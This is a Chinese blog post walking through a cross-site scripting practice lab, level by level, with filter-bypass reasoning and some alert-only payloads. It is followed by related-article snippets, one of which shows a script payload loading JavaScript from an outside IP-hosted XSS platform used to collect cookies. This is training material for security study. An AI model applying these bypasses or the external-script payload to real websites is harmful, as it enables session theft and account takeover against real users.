xss攻关小练习

最新推荐文章于 2025-03-10 19:25:29 发布
最新推荐文章于 2025-03-10 19:25:29 发布
阅读量465 收藏
点赞数
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41438190/article/details/96646875
版权

xss攻关小练习

第一关

过关条件
在这里插入图片描述
payload:
在这里插入图片描述
在这里插入图片描述

第二关

这里没有对输入的值实现htmlspecialchars函数梳理,所以直接闭合绕过
在搜索框里输入payload:
在这里插入图片描述
在这里插入图片描述

第三关

htmlspecialchars默认是不过滤单引号的,所以构造payload
’ οnclick='window.alert()
在这里插入图片描述

第四关

这里过滤了<和>,然后是双引号闭合,所以构造payload
" οnclick="window.alert()
在这里插入图片描述

第五关

过滤了script和on。所以之前的时间触发不能再用。
尝试嵌入一个链接payload:
在这里插入图片描述
在这里插入图片描述

第六关

这关过滤了on、src、data、href,但是没有过滤大小写
构造payload:
在这里插入图片描述
在这里插入图片描述

第七关

这里过滤为空,所以可以双写绕过
构造payload:
在这里插入图片描述
在这里插入图片描述

第八关

这里过滤了很多,但可以html编码绕过
在这里插入图片描述
在这里插入图片描述

第九关

尝试加上http://这个关键字
构造如下payload:
在这里插入图片描述
在这里插入图片描述

第十关

通过keyword传递如下payload来绕过,并单击输入框
在这里插入图片描述
在这里插入图片描述

第十一关

可以抓包通过构造referer的payload来实现xss攻击
构造payload:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第十二关

跟十一关差不多,改一下user-agent即可
在这里插入图片描述
在这里插入图片描述

第十三关

这里把cookie的user改为如下payload
在这里插入图片描述
在这里插入图片描述

第十四关及以后

参考(https://blog.youkuaiyun.com/fly_hps/article/details/84974334)

who am i?@_@
关注
XSS练习
haha1314的博客
07-21 913
0x00 function render (input) { return '<div>' + input + '</div>' } 没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script> 0x01 function render (input) { return...
XSS靶场level15详细通关教程
m0_49434302的博客
07-07 2036
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15关的时候,怎么也无法通关。我这个朋友在15关卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
XSS-Lab靶场练习 (1-10)
jouranx的博客
03-10 929
确定漏洞类型通过 URL 参数传递,立即执行。数据存入数据库,后续访问者触发。由前端 JavaScript 解析并执行。查看页面源代码 & F12 调试找到输入字段(如name=message=观察是否有innerHTMLeval()等可疑代码。测试基本 XSS(测试 WAF 规则<script>是否被拦截?是否可用?是否有字符限制(长度、URL 编码)?构造有效 Payload基础 XSS(测试能否弹窗)窃取 Cookie、伪造请求、键盘记录。
XSS攻关练习
黑面狐
08-21 6217
从论坛找到的一个XSS练习源码: 于是开始攻关之路,每攻关一次就更新一下: 第一关: 最简单的直接输入一个标签就直接被执行了,说明完全没有过滤标签。 然后看看源码,看看需要怎样才能通关。 那就是直接调用windows.alert()这个函数就可以通关。 简单明了。 192.168.23.248:93/level1.php?name=window.alert()
Xss练习(level1-10)
AmyBaby00的博客
09-04 678
Xss练习 找输入点,输出点,能往页面上写东西,写的东西可以反馈出来。例如:搜索框 “ ”双引号包裹,会被网页源代码 当作普通的字符串。不是代码执行 尖括号成对出现,闭合<> (Xss防护:就是把有危险的词组屏蔽掉) level1 找输入点:在url里面可以看到name=test,只需构造一个基本的语句,执行该语句即name=”这里就是先把input内的双引号和尖括号闭合,然后再写我们...
dvwa通关
03-28
DVWA是一个专门设计用于安全测试的Web应用,包含多种漏洞,如SQL注入、XSS、文件上传等,适合练习渗透测试技术。 接下来,用户可能需要具体的步骤指南,比如如何搭建DVWA环境。我记得DVWA通常需要在本地服务器上...
ZVulDirll综合靶场通关
最新发布
04-03
### ZVulDrill综合靶场攻关方法与教程 #### 1. 靶场概述 ZVulDrill 是一款专注于 Web 安全学习的靶场工具,主要用于帮助初学者了解常见的漏洞原理以及如何利用这些漏洞。通过该靶场的学习,可以掌握 SQL 注入、XSS ...
xss练习
weixin_30338497的博客
12-18 105
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 首先看下HTML: <!DOCTYPE html> <html> <head lang="en"> <meta charset="UTF-8"> &...
XSS练习
留得半世听茶香的博客
03-05 397
文章转载自:https://blog.youkuaiyun.com/Ni9htMar3/article/details/77938899 ...
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
XSS练习(皮卡湫+XSS-labs+Burpsuit靶场)
weixin_64936150的博客
09-01 1642
发现我们的输入被传入到了href中,绑定给了what do you see,先试一下能不能直接给他闭合了。发现传入的参数一直被包裹,可能有符号被转义了,丢几个常见的闭合个上去看看闭合方式。这关我们登录进来后发现了输入框,还是直接尝试看能否弹窗,发现可以直接xss。测试发现双引号闭合,传入的值仍然在input中,再试一下上一题用到的事件。各种方法都尝试过了,都不可行,看源码发现判断了输入中有没有http://发现全加了下划线,大小写也无法绕过,那就只能看看加密能不能被解析了。
xss平台练习
A1956936030的博客
10-22 556
1.靶机蓝莲花BLUE-LOTUS http://117.167.136.240:10080/admin.php 默认登录密码:bluelotus 2.靶机网站 http://117.167.136.240:38001/ 找输入口 找到输入口在register 弹出框如下: 添加新的default模板并生成payload 复制payload: <script src="http://117.167.136.240:10080/myjs/s.js"></script> 成
xss靶场练习
qq_46804551的博客
11-02 295
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
xss练习
Reset
11-23 1113
做了一个xss弹窗练习,不知道有的地方理解的或者操作的对不对,只是记录一些过程,如果有错还请指出。 https://xss.twosecurity.xyz/topic1?name=1   附上地址 要确定xss是在什么地方发生的,一个小方法就是先输入一个文本,自己要记住。然后查看源码,ctrl+f,查找就可以确定位置了。有的没有输入框就是在url的参数中。 1.输出在html中: 可以...
XSS-labs 实战(练习篇)
qtttgeq的博客
02-18 270
xss Labs通关
(网安小白)XSS靶场练习
qq_52958658的博客
05-20 282
学习记录
xss练习记录
JDWDXN的博客
10-12 463
level2 构造闭合绕过 校验代码 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值